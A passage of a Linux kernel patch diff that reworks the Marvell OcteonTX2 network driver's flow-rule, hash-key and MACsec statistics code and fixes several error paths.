+-		action = pfvf->def_ucast_rule->rx_action;
++	if (req->op == NIX_RX_ACTION_DEFAULT) {
++		if (pfvf->def_ucast_rule) {
++			action = pfvf->def_ucast_rule->rx_action;
++		} else {
++			/* For profiles which do not extract DMAC, the default
++			 * unicast entry is unused. Hence modify action for the
++			 * requests which use same action as default unicast
++			 * entry
++			 */
++			*(u64 *)&action = 0;
++			action.pf_func = target;
++			action.op = NIX_RX_ACTIONOP_UCAST;
++		}
++	}
+ 
+ 	entry->action = *(u64 *)&action;
+ 
+@@ -1153,6 +1205,7 @@ find_rule:
+ 	rule->chan_mask = write_req.entry_data.kw_mask[0] & NPC_KEX_CHAN_MASK;
+ 	rule->chan = write_req.entry_data.kw[0] & NPC_KEX_CHAN_MASK;
+ 	rule->chan &= rule->chan_mask;
++	rule->lxmb = dummy.lxmb;
+ 	if (is_npc_intf_tx(req->intf))
+ 		rule->intf = pfvf->nix_tx_intf;
+ 	else
+@@ -1215,6 +1268,35 @@ int rvu_mbox_handler_npc_install_flow(struct rvu *rvu,
+ 	if (!is_npc_interface_valid(rvu, req->intf))
+ 		return NPC_FLOW_INTF_INVALID;
+ 
++	/* If DMAC is not extracted in MKEX, rules installed by AF
++	 * can rely on L2MB bit set by hardware protocol checker for
++	 * broadcast and multicast addresses.
++	 */
++	if (npc_check_field(rvu, blkaddr, NPC_DMAC, req->intf))
++		goto process_flow;
++
++	if (is_pffunc_af(req->hdr.pcifunc) &&
++	    req->features & BIT_ULL(NPC_DMAC)) {
++		if (is_unicast_ether_addr(req->packet.dmac)) {
++			dev_warn(rvu->dev,
++				 "%s: mkex profile does not support ucast flow\n",
++				 __func__);
++			return NPC_FLOW_NOT_SUPPORTED;
++		}
++
++		if (!npc_is_field_present(rvu, NPC_LXMB, req->intf)) {
++			dev_warn(rvu->dev,
++				 "%s: mkex profile does not support bcast/mcast flow",
++				 __func__);
++			return NPC_FLOW_NOT_SUPPORTED;
++		}
++
++		/* Modify feature to use LXMB instead of DMAC */
++		req->features &= ~BIT_ULL(NPC_DMAC);
++		req->features |= BIT_ULL(NPC_LXMB);
++	}
++
++process_flow:
+ 	if (from_vf && req->default_rule)
+ 		return NPC_FLOW_VF_PERM_DENIED;
+ 
+@@ -1558,3 +1640,22 @@ int npc_install_mcam_drop_rule(struct rvu *rvu, int mcam_idx, u16 *counter_idx,
+ 
+ 	return 0;
+ }
++
++int rvu_mbox_handler_npc_get_field_status(struct rvu *rvu,
++					  struct npc_get_field_status_req *req,
++					  struct npc_get_field_status_rsp *rsp)
++{
++	int blkaddr;
++
++	blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NPC, 0);
++	if (blkaddr < 0)
++		return NPC_MCAM_INVALID_REQ;
++
++	if (!is_npc_interface_valid(rvu, req->intf))
++		return NPC_FLOW_INTF_INVALID;
++
++	if (npc_check_field(rvu, blkaddr, req->field, req->intf))
++		rsp->enable = 1;
++
++	return 0;
++}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
+index bdd65ce56a32d..3f5c9042d10e7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
+@@ -9,6 +9,10 @@
+ #define __RVU_NPC_FS_H
+ 
+ #define IPV6_WORDS	4
++#define NPC_BYTESM	GENMASK_ULL(19, 16)
++#define NPC_HDR_OFFSET	GENMASK_ULL(15, 8)
++#define NPC_KEY_OFFSET	GENMASK_ULL(5, 0)
++#define NPC_LDATA_EN	BIT_ULL(7)
+ 
+ void npc_update_entry(struct rvu *rvu, enum key_fields type,
+ 		      struct mcam_entry *entry, u64 val_lo,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 594029007f85d..3182adb7b9a80 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -78,42 +78,43 @@ static u32 rvu_npc_toeplitz_hash(const u64 *data, u64 *key, size_t data_bit_len,
+ 	return hash_out;
+ }
+ 
+-u32 npc_field_hash_calc(u64 *ldata, struct npc_mcam_kex_hash *mkex_hash,
+-			u64 *secret_key, u8 intf, u8 hash_idx)
++u32 npc_field_hash_calc(u64 *ldata, struct npc_get_field_hash_info_rsp rsp,
++			u8 intf, u8 hash_idx)
+ {
+ 	u64 hash_key[3];
+ 	u64 data_padded[2];
+ 	u32 field_hash;
+ 
+-	hash_key[0] = secret_key[1] << 31;
+-	hash_key[0] |= secret_key[2];
+-	hash_key[1] = secret_key[1] >> 33;
+-	hash_key[1] |= secret_key[0] << 31;
+-	hash_key[2] = secret_key[0] >> 33;
++	hash_key[0] = rsp.secret_key[1] << 31;
++	hash_key[0] |= rsp.secret_key[2];
++	hash_key[1] = rsp.secret_key[1] >> 33;
++	hash_key[1] |= rsp.secret_key[0] << 31;
++	hash_key[2] = rsp.secret_key[0] >> 33;
+ 
+-	data_padded[0] = mkex_hash->hash_mask[intf][hash_idx][0] & ldata[0];
+-	data_padded[1] = mkex_hash->hash_mask[intf][hash_idx][1] & ldata[1];
++	data_padded[0] = rsp.hash_mask[intf][hash_idx][0] & ldata[0];
++	data_padded[1] = rsp.hash_mask[intf][hash_idx][1] & ldata[1];
+ 	field_hash = rvu_npc_toeplitz_hash(data_padded, hash_key, 128, 159);
+ 
+-	field_hash &= mkex_hash->hash_ctrl[intf][hash_idx] >> 32;
+-	field_hash |= mkex_hash->hash_ctrl[intf][hash_idx];
++	field_hash &= FIELD_GET(GENMASK(63, 32), rsp.hash_ctrl[intf][hash_idx]);
++	field_hash += FIELD_GET(GENMASK(31, 0), rsp.hash_ctrl[intf][hash_idx]);
+ 	return field_hash;
+ }
+ 
+-static u64 npc_update_use_hash(int lt, int ld)
++static u64 npc_update_use_hash(struct rvu *rvu, int blkaddr,
++			       u8 intf, int lid, int lt, int ld)
+ {
+-	u64 cfg = 0;
+-
+-	switch (lt) {
+-	case NPC_LT_LC_IP6:
+-		/* Update use_hash(bit-20) and bytesm1 (bit-16:19)
+-		 * in KEX_LD_CFG
+-		 */
+-		cfg = KEX_LD_CFG_USE_HASH(0x1, 0x03,
+-					  ld ? 0x8 : 0x18,
+-					  0x1, 0x0, 0x10);
+-		break;
+-	}
++	u8 hdr, key;
++	u64 cfg;
++
++	cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_LIDX_LTX_LDX_CFG(intf, lid, lt, ld));
++	hdr = FIELD_GET(NPC_HDR_OFFSET, cfg);
++	key = FIELD_GET(NPC_KEY_OFFSET, cfg);
++
++	/* Update use_hash(bit-20) to 'true' and
++	 * bytesm1(bit-16:19) to '0x3' in KEX_LD_CFG
++	 */
++	cfg = KEX_LD_CFG_USE_HASH(0x1, 0x03,
++				  hdr, 0x1, 0x0, key);
+ 
+ 	return cfg;
+ }
+@@ -132,12 +133,13 @@ static void npc_program_mkex_hash_rx(struct rvu *rvu, int blkaddr,
+ 		for (lt = 0; lt < NPC_MAX_LT; lt++) {
+ 			for (ld = 0; ld < NPC_MAX_LD; ld++) {
+ 				if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][ld]) {
+-					u64 cfg = npc_update_use_hash(lt, ld);
++					u64 cfg;
+ 
+-					hash_cnt++;
+ 					if (hash_cnt == NPC_MAX_HASH)
+ 						return;
+ 
++					cfg = npc_update_use_hash(rvu, blkaddr,
++								  intf, lid, lt, ld);
+ 					/* Set updated KEX configuration */
+ 					SET_KEX_LD(intf, lid, lt, ld, cfg);
+ 					/* Set HASH configuration */
+@@ -149,6 +151,8 @@ static void npc_program_mkex_hash_rx(struct rvu *rvu, int blkaddr,
+ 							     mkex_hash->hash_mask[intf][ld][1]);
+ 					SET_KEX_LD_HASH_CTRL(intf, ld,
+ 							     mkex_hash->hash_ctrl[intf][ld]);
++
++					hash_cnt++;
+ 				}
+ 			}
+ 		}
+@@ -169,12 +173,13 @@ static void npc_program_mkex_hash_tx(struct rvu *rvu, int blkaddr,
+ 		for (lt = 0; lt < NPC_MAX_LT; lt++) {
+ 			for (ld = 0; ld < NPC_MAX_LD; ld++)
+ 				if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][ld]) {
+-					u64 cfg = npc_update_use_hash(lt, ld);
++					u64 cfg;
+ 
+-					hash_cnt++;
+ 					if (hash_cnt == NPC_MAX_HASH)
+ 						return;
+ 
++					cfg = npc_update_use_hash(rvu, blkaddr,
++								  intf, lid, lt, ld);
+ 					/* Set updated KEX configuration */
+ 					SET_KEX_LD(intf, lid, lt, ld, cfg);
+ 					/* Set HASH configuration */
+@@ -187,8 +192,6 @@ static void npc_program_mkex_hash_tx(struct rvu *rvu, int blkaddr,
+ 					SET_KEX_LD_HASH_CTRL(intf, ld,
+ 							     mkex_hash->hash_ctrl[intf][ld]);
+ 					hash_cnt++;
+-					if (hash_cnt == NPC_MAX_HASH)
+-						return;
+ 				}
+ 		}
+ 	}
+@@ -242,8 +245,8 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 			   struct flow_msg *omask)
+ {
+ 	struct npc_mcam_kex_hash *mkex_hash = rvu->kpu.mkex_hash;
+-	struct npc_get_secret_key_req req;
+-	struct npc_get_secret_key_rsp rsp;
++	struct npc_get_field_hash_info_req req;
++	struct npc_get_field_hash_info_rsp rsp;
+ 	u64 ldata[2], cfg;
+ 	u32 field_hash;
+ 	u8 hash_idx;
+@@ -254,7 +257,7 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 	}
+ 
+ 	req.intf = intf;
+-	rvu_mbox_handler_npc_get_secret_key(rvu, &req, &rsp);
++	rvu_mbox_handler_npc_get_field_hash_info(rvu, &req, &rsp);
+ 
+ 	for (hash_idx = 0; hash_idx < NPC_MAX_HASH; hash_idx++) {
+ 		cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_CFG(intf, hash_idx));
+@@ -270,44 +273,45 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 				 * is hashed to 32 bit value.
+ 				 */
+ 				case NPC_LT_LC_IP6:
+-					if (features & BIT_ULL(NPC_SIP_IPV6)) {
++					/* ld[0] == hash_idx[0] == Source IPv6
++					 * ld[1] == hash_idx[1] == Destination IPv6
++					 */
++					if ((features & BIT_ULL(NPC_SIP_IPV6)) && !hash_idx) {
+ 						u32 src_ip[IPV6_WORDS];
+ 
+ 						be32_to_cpu_array(src_ip, pkt->ip6src, IPV6_WORDS);
+-						ldata[0] = (u64)src_ip[0] << 32 | src_ip[1];
+-						ldata[1] = (u64)src_ip[2] << 32 | src_ip[3];
++						ldata[1] = (u64)src_ip[0] << 32 | src_ip[1];
++						ldata[0] = (u64)src_ip[2] << 32 | src_ip[3];
+ 						field_hash = npc_field_hash_calc(ldata,
+-										 mkex_hash,
+-										 rsp.secret_key,
++										 rsp,
+ 										 intf,
+ 										 hash_idx);
+ 						npc_update_entry(rvu, NPC_SIP_IPV6, entry,
+-								 field_hash, 0, 32, 0, intf);
++								 field_hash, 0,
++								 GENMASK(31, 0), 0, intf);
+ 						memcpy(&opkt->ip6src, &pkt->ip6src,
+ 						       sizeof(pkt->ip6src));
+ 						memcpy(&omask->ip6src, &mask->ip6src,
+ 						       sizeof(mask->ip6src));
+-						break;
+-					}
+-
+-					if (features & BIT_ULL(NPC_DIP_IPV6)) {
++					} else if ((features & BIT_ULL(NPC_DIP_IPV6)) && hash_idx) {
+ 						u32 dst_ip[IPV6_WORDS];
+ 
+ 						be32_to_cpu_array(dst_ip, pkt->ip6dst, IPV6_WORDS);
+-						ldata[0] = (u64)dst_ip[0] << 32 | dst_ip[1];
+-						ldata[1] = (u64)dst_ip[2] << 32 | dst_ip[3];
++						ldata[1] = (u64)dst_ip[0] << 32 | dst_ip[1];
++						ldata[0] = (u64)dst_ip[2] << 32 | dst_ip[3];
+ 						field_hash = npc_field_hash_calc(ldata,
+-										 mkex_hash,
+-										 rsp.secret_key,
++										 rsp,
+ 										 intf,
+ 										 hash_idx);
+ 						npc_update_entry(rvu, NPC_DIP_IPV6, entry,
+-								 field_hash, 0, 32, 0, intf);
++								 field_hash, 0,
++								 GENMASK(31, 0), 0, intf);
+ 						memcpy(&opkt->ip6dst, &pkt->ip6dst,
+ 						       sizeof(pkt->ip6dst));
+ 						memcpy(&omask->ip6dst, &mask->ip6dst,
+ 						       sizeof(mask->ip6dst));
+ 					}
++
+ 					break;
+ 				}
+ 			}
+@@ -315,13 +319,13 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 	}
+ }
+ 
+-int rvu_mbox_handler_npc_get_secret_key(struct rvu *rvu,
+-					struct npc_get_secret_key_req *req,
+-					struct npc_get_secret_key_rsp *rsp)
++int rvu_mbox_handler_npc_get_field_hash_info(struct rvu *rvu,
++					     struct npc_get_field_hash_info_req *req,
++					     struct npc_get_field_hash_info_rsp *rsp)
+ {
+ 	u64 *secret_key = rsp->secret_key;
+ 	u8 intf = req->intf;
+-	int blkaddr;
++	int i, j, blkaddr;
+ 
+ 	blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NPC, 0);
+ 	if (blkaddr < 0) {
+@@ -333,6 +337,19 @@ int rvu_mbox_handler_npc_get_secret_key(struct rvu *rvu,
+ 	secret_key[1] = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY1(intf));
+ 	secret_key[2] = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY2(intf));
+ 
++	for (i = 0; i < NPC_MAX_HASH; i++) {
++		for (j = 0; j < NPC_MAX_HASH_MASK; j++) {
++			rsp->hash_mask[NIX_INTF_RX][i][j] =
++				GET_KEX_LD_HASH_MASK(NIX_INTF_RX, i, j);
++			rsp->hash_mask[NIX_INTF_TX][i][j] =
++				GET_KEX_LD_HASH_MASK(NIX_INTF_TX, i, j);
++		}
++	}
++
++	for (i = 0; i < NPC_MAX_INTF; i++)
++		for (j = 0; j < NPC_MAX_HASH; j++)
++			rsp->hash_ctrl[i][j] = GET_KEX_LD_HASH_CTRL(i, j);
++
+ 	return 0;
+ }
+ 
+@@ -1879,9 +1896,9 @@ int rvu_npc_exact_init(struct rvu *rvu)
+ 	rvu->hw->table = table;
+ 
+ 	/* Read table size, ways and depth */
+-	table->mem_table.depth = FIELD_GET(GENMASK_ULL(31, 24), npc_const3);
+ 	table->mem_table.ways = FIELD_GET(GENMASK_ULL(19, 16), npc_const3);
+-	table->cam_table.depth = FIELD_GET(GENMASK_ULL(15, 0), npc_const3);
++	table->mem_table.depth = FIELD_GET(GENMASK_ULL(15, 0), npc_const3);
++	table->cam_table.depth = FIELD_GET(GENMASK_ULL(31, 24), npc_const3);
+ 
+ 	dev_dbg(rvu->dev, "%s: NPC exact match 4way_2k table(ways=%d, depth=%d)\n",
+ 		__func__,  table->mem_table.ways, table->cam_table.depth);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+index 3efeb09c58dec..a1c3d987b8044 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+@@ -31,6 +31,12 @@
+ 	rvu_write64(rvu, blkaddr,	\
+ 		    NPC_AF_INTFX_HASHX_MASKX(intf, ld, mask_idx), cfg)
+ 
++#define GET_KEX_LD_HASH_CTRL(intf, ld)	\
++	rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_RESULT_CTRL(intf, ld))
++
++#define GET_KEX_LD_HASH_MASK(intf, ld, mask_idx)	\
++	rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_MASKX(intf, ld, mask_idx))
++
+ #define SET_KEX_LD_HASH_CTRL(intf, ld, cfg) \
+ 	rvu_write64(rvu, blkaddr,	\
+ 		    NPC_AF_INTFX_HASHX_RESULT_CTRL(intf, ld), cfg)
+@@ -56,8 +62,8 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 			   struct flow_msg *omask);
+ void npc_config_secret_key(struct rvu *rvu, int blkaddr);
+ void npc_program_mkex_hash(struct rvu *rvu, int blkaddr);
+-u32 npc_field_hash_calc(u64 *ldata, struct npc_mcam_kex_hash *mkex_hash,
+-			u64 *secret_key, u8 intf, u8 hash_idx);
++u32 npc_field_hash_calc(u64 *ldata, struct npc_get_field_hash_info_rsp rsp,
++			u8 intf, u8 hash_idx);
+ 
+ static struct npc_mcam_kex_hash npc_mkex_hash_default __maybe_unused = {
+ 	.lid_lt_ld_hash_en = {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
+index 9ec5f38d38a84..a487a98eac88c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
+@@ -9,6 +9,7 @@
+ #include <net/macsec.h>
+ #include "otx2_common.h"
+ 
++#define MCS_TCAM0_MAC_DA_MASK		GENMASK_ULL(47, 0)
+ #define MCS_TCAM0_MAC_SA_MASK		GENMASK_ULL(63, 48)
+ #define MCS_TCAM1_MAC_SA_MASK		GENMASK_ULL(31, 0)
+ #define MCS_TCAM1_ETYPE_MASK		GENMASK_ULL(47, 32)
+@@ -149,11 +150,20 @@ static void cn10k_mcs_free_rsrc(struct otx2_nic *pfvf, enum mcs_direction dir,
+ 				enum mcs_rsrc_type type, u16 hw_rsrc_id,
+ 				bool all)
+ {
++	struct mcs_clear_stats *clear_req;
+ 	struct mbox *mbox = &pfvf->mbox;
+ 	struct mcs_free_rsrc_req *req;
+ 
+ 	mutex_lock(&mbox->lock);
+ 
++	clear_req = otx2_mbox_alloc_msg_mcs_clear_stats(mbox);
++	if (!clear_req)
++		goto fail;
++
++	clear_req->id = hw_rsrc_id;
++	clear_req->type = type;
++	clear_req->dir = dir;
++
+ 	req = otx2_mbox_alloc_msg_mcs_free_resources(mbox);
+ 	if (!req)
+ 		goto fail;
+@@ -237,8 +247,10 @@ static int cn10k_mcs_write_rx_flowid(struct otx2_nic *pfvf,
+ 				     struct cn10k_mcs_rxsc *rxsc, u8 hw_secy_id)
+ {
+ 	struct macsec_rx_sc *sw_rx_sc = rxsc->sw_rxsc;
++	struct macsec_secy *secy = rxsc->sw_secy;
+ 	struct mcs_flowid_entry_write_req *req;
+ 	struct mbox *mbox = &pfvf->mbox;
++	u64 mac_da;
+ 	int ret;
+ 
+ 	mutex_lock(&mbox->lock);
+@@ -249,11 +261,16 @@ static int cn10k_mcs_write_rx_flowid(struct otx2_nic *pfvf,
+ 		goto fail;
+ 	}
+ 
++	mac_da = ether_addr_to_u64(secy->netdev->dev_addr);
++
++	req->data[0] = FIELD_PREP(MCS_TCAM0_MAC_DA_MASK, mac_da);
++	req->mask[0] = ~0ULL;
++	req->mask[0] = ~MCS_TCAM0_MAC_DA_MASK;
++
+ 	req->data[1] = FIELD_PREP(MCS_TCAM1_ETYPE_MASK, ETH_P_MACSEC);
+ 	req->mask[1] = ~0ULL;
+ 	req->mask[1] &= ~MCS_TCAM1_ETYPE_MASK;
+ 
+-	req->mask[0] = ~0ULL;
+ 	req->mask[2] = ~0ULL;
+ 	req->mask[3] = ~0ULL;
+ 
+@@ -997,7 +1014,7 @@ static void cn10k_mcs_sync_stats(struct otx2_nic *pfvf, struct macsec_secy *secy
+ 
+ 	/* Check if sync is really needed */
+ 	if (secy->validate_frames == txsc->last_validate_frames &&
+-	    secy->protect_frames == txsc->last_protect_frames)
++	    secy->replay_protect == txsc->last_replay_protect)
+ 		return;
+ 
+ 	cn10k_mcs_secy_stats(pfvf, txsc->hw_secy_id_rx, &rx_rsp, MCS_RX, true);
+@@ -1019,19 +1036,19 @@ static void cn10k_mcs_sync_stats(struct otx2_nic *pfvf, struct macsec_secy *secy
+ 		rxsc->stats.InPktsInvalid += sc_rsp.pkt_invalid_cnt;
+ 		rxsc->stats.InPktsNotValid += sc_rsp.pkt_notvalid_cnt;
+ 
+-		if (txsc->last_protect_frames)
++		if (txsc->last_replay_protect)
+ 			rxsc->stats.InPktsLate += sc_rsp.pkt_late_cnt;
+ 		else
+ 			rxsc->stats.InPktsDelayed += sc_rsp.pkt_late_cnt;
+ 
+-		if (txsc->last_validate_frames == MACSEC_VALIDATE_CHECK)
++		if (txsc->last_validate_frames == MACSEC_VALIDATE_DISABLED)
+ 			rxsc->stats.InPktsUnchecked += sc_rsp.pkt_unchecked_cnt;
+ 		else
+ 			rxsc->stats.InPktsOK += sc_rsp.pkt_unchecked_cnt;
+ 	}
+ 
+ 	txsc->last_validate_frames = secy->validate_frames;
+-	txsc->last_protect_frames = secy->protect_frames;
++	txsc->last_replay_protect = secy->replay_protect;
+ }
+ 
+ static int cn10k_mdo_open(struct macsec_context *ctx)
+@@ -1100,7 +1117,7 @@ static int cn10k_mdo_add_secy(struct macsec_context *ctx)
+ 	txsc->sw_secy = secy;
+ 	txsc->encoding_sa = secy->tx_sc.encoding_sa;
+ 	txsc->last_validate_frames = secy->validate_frames;
+-	txsc->last_protect_frames = secy->protect_frames;
++	txsc->last_replay_protect = secy->replay_protect;
+ 
+ 	list_add(&txsc->entry, &cfg->txsc_list);
+ 
+@@ -1117,6 +1134,7 @@ static int cn10k_mdo_upd_secy(struct macsec_context *ctx)
+ 	struct macsec_secy *secy = ctx->secy;
+ 	struct macsec_tx_sa *sw_tx_sa;
+ 	struct cn10k_mcs_txsc *txsc;
++	bool active;
+ 	u8 sa_num;
+ 	int err;
+ 
+@@ -1124,15 +1142,19 @@ static int cn10k_mdo_upd_secy(struct macsec_context *ctx)
+ 	if (!txsc)
+ 		return -ENOENT;
+ 
+-	txsc->encoding_sa = secy->tx_sc.encoding_sa;
+-
+-	sa_num = txsc->encoding_sa;
+-	sw_tx_sa = rcu_dereference_bh(secy->tx_sc.sa[sa_num]);
++	/* Encoding SA got changed */
++	if (txsc->encoding_sa != secy->tx_sc.encoding_sa) {
++		txsc->encoding_sa = secy->tx_sc.encoding_sa;
++		sa_num = txsc->encoding_sa;
++		sw_tx_sa = rcu_dereference_bh(secy->tx_sc.sa[sa_num]);
++		active = sw_tx_sa ? sw_tx_sa->active : false;
++		cn10k_mcs_link_tx_sa2sc(pfvf, secy, txsc, sa_num, active);
++	}
+ 
+ 	if (netif_running(secy->netdev)) {
+ 		cn10k_mcs_sync_stats(pfvf, secy, txsc);
+ 
+-		err = cn10k_mcs_secy_tx_cfg(pfvf, secy, txsc, sw_tx_sa, sa_num);
++		err = cn10k_mcs_secy_tx_cfg(pfvf, secy, txsc, NULL, 0);
+ 		if (err)
+ 			return err;
+ 	}
+@@ -1521,12 +1543,12 @@ static int cn10k_mdo_get_rx_sc_stats(struct macsec_context *ctx)
+ 	rxsc->stats.InPktsInvalid += rsp.pkt_invalid_cnt;
+ 	rxsc->stats.InPktsNotValid += rsp.pkt_notvalid_cnt;
+ 
+-	if (secy->protect_frames)
++	if (secy->replay_protect)
+ 		rxsc->stats.InPktsLate += rsp.pkt_late_cnt;
+ 	else
+ 		rxsc->stats.InPktsDelayed += rsp.pkt_late_cnt;
+ 
+-	if (secy->validate_frames == MACSEC_VALIDATE_CHECK)
++	if (secy->validate_frames == MACSEC_VALIDATE_DISABLED)
+ 		rxsc->stats.InPktsUnchecked += rsp.pkt_unchecked_cnt;
+ 	else
+ 		rxsc->stats.InPktsOK += rsp.pkt_unchecked_cnt;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 712715a49d201..241016ca64d05 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -332,11 +332,11 @@ struct otx2_flow_config {
+ #define OTX2_PER_VF_VLAN_FLOWS	2 /* Rx + Tx per VF */
+ #define OTX2_VF_VLAN_RX_INDEX	0
+ #define OTX2_VF_VLAN_TX_INDEX	1
+-	u16			max_flows;
+-	u8			dmacflt_max_flows;
+ 	u32			*bmap_to_dmacindex;
+ 	unsigned long		*dmacflt_bmap;
+ 	struct list_head	flow_list;
++	u32			dmacflt_max_flows;
++	u16                     max_flows;
+ };
+ 
+ struct otx2_tc_info {
+@@ -386,7 +386,7 @@ struct cn10k_mcs_txsc {
+ 	struct cn10k_txsc_stats stats;
+ 	struct list_head entry;
+ 	enum macsec_validation_type last_validate_frames;
+-	bool last_protect_frames;
++	bool last_replay_protect;
+ 	u16 hw_secy_id_tx;
+ 	u16 hw_secy_id_rx;
+ 	u16 hw_flow_id;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 0f7345a96965b..d0554f6d26731 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -164,6 +164,8 @@ EXPORT_SYMBOL(otx2_alloc_mcam_entries);
+ static int otx2_mcam_entry_init(struct otx2_nic *pfvf)
+ {
+ 	struct otx2_flow_config *flow_cfg = pfvf->flow_cfg;
++	struct npc_get_field_status_req *freq;
++	struct npc_get_field_status_rsp *frsp;
+ 	struct npc_mcam_alloc_entry_req *req;
+ 	struct npc_mcam_alloc_entry_rsp *rsp;
+ 	int vf_vlan_max_flows;
+@@ -214,8 +216,29 @@ static int otx2_mcam_entry_init(struct otx2_nic *pfvf)
+ 	flow_cfg->rx_vlan_offset = flow_cfg->unicast_offset +
+ 					OTX2_MAX_UNICAST_FLOWS;
+ 	pfvf->flags |= OTX2_FLAG_UCAST_FLTR_SUPPORT;
+-	pfvf->flags |= OTX2_FLAG_RX_VLAN_SUPPORT;
+-	pfvf->flags |= OTX2_FLAG_VF_VLAN_SUPPORT;
++
++	/* Check if NPC_DMAC field is supported
++	 * by the mkex profile before setting VLAN support flag.
++	 */
++	freq = otx2_mbox_alloc_msg_npc_get_field_status(&pfvf->mbox);
++	if (!freq) {
++		mutex_unlock(&pfvf->mbox.lock);
++		return -ENOMEM;
++	}
++
++	freq->field = NPC_DMAC;
++	if (otx2_sync_mbox_msg(&pfvf->mbox)) {
++		mutex_unlock(&pfvf->mbox.lock);
++		return -EINVAL;
++	}
++
++	frsp = (struct npc_get_field_status_rsp *)otx2_mbox_get_rsp
++	       (&pfvf->mbox.mbox, 0, &freq->hdr);
++
++	if (frsp->enable) {
++		pfvf->flags |= OTX2_FLAG_RX_VLAN_SUPPORT;
++		pfvf->flags |= OTX2_FLAG_VF_VLAN_SUPPORT;
++	}
+ 
+ 	pfvf->flags |= OTX2_FLAG_MCAM_ENTRIES_ALLOC;
+ 	mutex_unlock(&pfvf->mbox.lock);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 303930499a4c0..ed911d9946277 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1835,13 +1835,22 @@ int otx2_open(struct net_device *netdev)
+ 		otx2_dmacflt_reinstall_flows(pf);
+ 
+ 	err = otx2_rxtx_enable(pf, true);
+-	if (err)
++	/* If a mbox communication error happens at this point then interface
++	 * will end up in a state such that it is in down state but hardware
++	 * mcam entries are enabled to receive the packets. Hence disable the
++	 * packet I/O.
++	 */
++	if (err == EIO)
++		goto err_disable_rxtx;
++	else if (err)
+ 		goto err_tx_stop_queues;
+ 
+ 	otx2_do_set_rx_mode(pf);
+ 
+ 	return 0;
+ 
++err_disable_rxtx:
++	otx2_rxtx_enable(pf, false);
+ err_tx_stop_queues:
+ 	netif_tx_stop_all_queues(netdev);
+ 	netif_carrier_off(netdev);
+@@ -3069,8 +3078,6 @@ static void otx2_remove(struct pci_dev *pdev)
+ 		otx2_config_pause_frm(pf);
+ 	}
+ 
+-	cn10k_mcs_free(pf);
+-
+ #ifdef CONFIG_DCB
+ 	/* Disable PFC config */
+ 	if (pf->pfc_en) {
+@@ -3084,6 +3091,7 @@ static void otx2_remove(struct pci_dev *pdev)
+ 
+ 	otx2_unregister_dl(pf);
+ 	unregister_netdev(netdev);
++	cn10k_mcs_free(pf);
+ 	otx2_sriov_disable(pf->pdev);
+ 	otx2_sriov_vfcfg_cleanup(pf);
+ 	if (pf->otx2_wq)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index ab126f8706c74..53366dbfbf27c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -621,7 +621,7 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 
+ 	err = otx2vf_realloc_msix_vectors(vf);
+ 	if (err)
+-		goto err_mbox_destroy;
++		goto err_detach_rsrc;
+ 
+ 	err = otx2_set_real_num_queues(netdev, qcount, qcount);
+ 	if (err)
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_devlink.c b/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
+index 4297ed9024c01..2696dac21b096 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
